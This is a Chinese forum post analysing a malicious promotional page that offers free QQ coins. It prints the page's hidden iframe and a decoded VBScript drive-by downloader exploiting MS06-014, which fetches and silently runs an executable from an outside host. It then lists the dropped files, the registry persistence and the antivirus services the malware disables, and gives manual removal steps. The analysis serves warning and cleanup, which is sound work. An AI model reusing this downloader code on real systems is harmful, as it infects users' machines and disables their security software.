今天群里有人发了浙江互联星空现在答题送QB了,今天搞活动,活动地址 hXXp://zj.vnetqqx.cn
偶也想去看,另一个人说有毒。我去看了下代码真的有问题
代码前部有
<iframe src==hXXp://www.jrrmai.com/ad/goldsun.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
再看hXXp://www.jrrmai.com/ad/goldsun.htm代码,有一个加密的VBS,用FSO还原出来后
<html>
<script language="VBScript">
on error resume next
dl = "hXXp://www.jrrmai.com/ad/down.exe"
Set df = document.createElement("
object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.Create
Object(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.create
object(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.create
object("Scripting.FileSystem
Object","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.create
object("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>Oh,my god! Goldsun[at]84823714</title>
</head><body>
<center>You DO it!</center>
</body></html>
利用MS06-14漏洞下载hXXp://www.jrrmai.com/ad/down.exe
我把这样本下来运后,释放文件
C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dll
C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dat
C:\WINDOWS\Help\wshmcepts.chm
C:\WINDOWS\system32\wdfmgr32.exe
C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\tmdqq.exe
C:\WINDOWS\system32\systen.exe
C:\WINDOWS\system32\verclsid.exe(系统文件) 修改为 C:\WINDOWS\system32\verclsid.exe.bak
产生相关的注册表
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks分支添加
{2252A8C2-A8C2-2524-C225-8C2528C22524}
HKCR\CLSID\{A48AA915-9150-5091-948A-09094A91508A}\InProcServer32\(默认)
修改为C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dll
注册表键: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
值: C:\WINDOWS\system32\wdfmgr32.exe
注册表键:HKLM\SYSTEM\CurrentControlSet\Services\system
值:C:\WINDOWS\svchost.exe
修改HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\Start
00000002 为 00000004
还产生了一大堆禁用安全软件服务的注册表
HKLM\SYSTEM\CurrentControlSet\Services\AVP
HKLM\SYSTEM\CurrentControlSet\Services\navapsvc
HKLM\SYSTEM\CurrentControlSet\Services\RsRavMon
HKLM\SYSTEM\CurrentControlSet\Services\RsCCenter
HKLM\SYSTEM\CurrentControlSet\Services\kavsvc
HKLM\SYSTEM\CurrentControlSet\Services\KVSrvXP
HKLM\SYSTEM\CurrentControlSet\Services\KVWSC
HKLM\SYSTEM\CurrentControlSet\Services\KPfwSvc
HKLM\SYSTEM\CurrentControlSet\Services\KWatchSvc
HKLM\SYSTEM\CurrentControlSet\Services\ccProxy
HKLM\SYSTEM\CurrentControlSet\Services\ccEvtMgr
HKLM\SYSTEM\CurrentControlSet\Services\ccSetMgr
HKLM\SYSTEM\CurrentControlSet\Services\SPBBCSvc
HKLM\SYSTEM\CurrentControlSet\Services\Symantec Core LC
HKLM\SYSTEM\CurrentControlSet\Services\NPFMntor
HKLM\SYSTEM\CurrentControlSet\Services\MskService
HKLM\SYSTEM\CurrentControlSet\Services\FireSvc
HKLM\SYSTEM\CurrentControlSet\Services\McShield
HKLM\SYSTEM\CurrentControlSet\Services\McTaskManager
HKLM\SYSTEM\CurrentControlSet\Services\McAfeeFramework
HKLM\SYSTEM\CurrentControlSet\Services\RfwService
HKLM\SYSTEM\CurrentControlSet\Services\SkyProcs
HKLM\SYSTEM\CurrentControlSet\Services\SKNFW
HKLM\SYSTEM\CurrentControlSet\Services\SNDSrvc
上述大致被禁用的有瑞星,卡巴,天网,咖啡,江民,金山。。。
解决方案:结束进程
C:\WINDOWS\system32\wdfmgr32.exe
C:\WINDOWS\svchost.exe
把SREng.exe改成SREng.com(发现这东西运行后,会让SREng无法启动)运行
删除启动项目==>注册表
<wdfmgr32><C:\WINDOWS\system32\wdfmgr32.exe> [N/A]
启动项目==>服务
[system / system]
<C:\WINDOWS\svchost.exe><N/A>
<{2252A8C2-A8C2-2524-C225-8C2528C22524}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dll> [N/A]
这个有注册表守护,删除后马上生成,所以先从文件下手,用
killbox的延迟删除功能(可以按图设置)可以轻松搞定,删除
C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dll
C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dat
显示隐藏文件后删除
C:\WINDOWS\system32\wdfmgr32.exe
C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\systen.exe
C:\WINDOWS\system32\tmdqq.exe
C:\WINDOWS\system32\verclsid.exe.bak(C:\WINDOWS\system32\verclsid.exe如果想要去复制一个就行了,没啥用)
C:\WINDOWS\Help\wshmcepts.chm
再打开SREng删除
<{2252A8C2-A8C2-2524-C225-8C2528C22524}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dll> [N/A]
删除上面产生的破坏杀软的注册表项
把HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\Start
值 00000004 改为 00000002
卸载掉杀毒软件 删除杀毒软件的文件夹后..重新安装..
